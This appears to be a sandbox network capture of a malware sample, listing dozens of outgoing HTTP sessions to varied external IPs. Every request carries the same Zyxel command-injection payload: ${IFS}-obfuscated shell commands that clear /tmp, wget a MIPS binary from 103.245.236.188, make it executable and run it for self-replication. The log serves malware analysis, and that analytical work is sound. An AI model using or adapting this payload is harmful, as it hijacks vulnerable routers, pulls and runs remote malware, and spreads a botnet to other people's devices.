                                                Jan 12, 2024 18:16:16.283535957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2818192.168.2.2354386170.132.183.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283581018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2819192.168.2.235703831.154.54.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283627987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2820192.168.2.235314046.208.236.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283668041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2821192.168.2.2360792197.184.47.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283705950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2822192.168.2.234974068.12.111.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283740044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2823192.168.2.233980061.187.105.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283812046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2824192.168.2.2340330149.244.179.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283849955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2825192.168.2.2342442216.237.59.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283953905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2826192.168.2.2345086206.240.239.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283977985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2827192.168.2.233734831.36.166.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284019947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2828192.168.2.2360448103.253.68.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284049034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2829192.168.2.2342014131.185.8.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284092903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2830192.168.2.2347168118.141.63.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284145117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2831192.168.2.235342462.72.188.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284168005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2832192.168.2.234567224.134.179.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284214973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2833192.168.2.234424846.41.73.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284249067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2834192.168.2.2348934185.183.36.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284301996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2835192.168.2.234372242.88.129.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284328938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2836192.168.2.2342574100.15.97.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284363031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2837192.168.2.233625273.51.36.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284408092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2838192.168.2.2338324194.117.93.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284431934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2839192.168.2.2340908174.146.69.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284454107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2840192.168.2.23384142.78.151.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284509897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2841192.168.2.2349262154.38.79.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284538031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2842192.168.2.233948648.124.189.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284596920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2843192.168.2.235135061.217.195.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284640074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2844192.168.2.2349526208.195.45.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284683943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2845192.168.2.2345126213.113.45.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284733057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2846192.168.2.2349938208.69.129.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284782887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2847192.168.2.2360854115.244.1.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284806013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2848192.168.2.2347442181.226.141.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284861088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2849192.168.2.2335012155.105.129.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284912109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2850192.168.2.234672275.234.148.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284965992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2851192.168.2.2349470170.27.138.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.284997940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2852192.168.2.2334600180.19.116.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285039902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2853192.168.2.233857044.3.74.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285058975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2854192.168.2.2348462151.181.129.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285093069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2855192.168.2.2356022141.159.34.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285145998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2856192.168.2.2344284202.69.184.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285180092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2857192.168.2.233854241.201.100.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285223961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2858192.168.2.236057646.252.201.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285249949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2859192.168.2.2358816125.114.114.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285300970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2860192.168.2.2340036168.63.192.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285329103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2861192.168.2.2336690103.199.115.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285356045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2862192.168.2.233843053.17.239.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285384893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2863192.168.2.233529639.163.48.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285408020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2864192.168.2.2342668148.227.211.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285454988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2865192.168.2.234031820.108.222.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285482883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2866192.168.2.233907045.208.61.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285500050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2867192.168.2.234200653.70.185.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285518885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2868192.168.2.2347274152.221.97.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285587072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2869192.168.2.2340484210.65.82.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285631895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2870192.168.2.2344784191.50.14.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285685062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2871192.168.2.23555369.238.13.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285696983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2872192.168.2.236063888.246.158.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.285722971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2873192.168.2.2344472142.59.109.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289705038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2874192.168.2.2351734131.41.247.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289747000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2875192.168.2.23367488.184.143.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289804935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2876192.168.2.235329287.188.78.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289849997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2877192.168.2.2341030167.189.209.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289894104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2878192.168.2.2344090173.245.103.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289942980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2879192.168.2.2359430166.109.81.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.289978027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2880192.168.2.2356226121.242.99.80443
                                                TimestampBytes transferredDirectionData
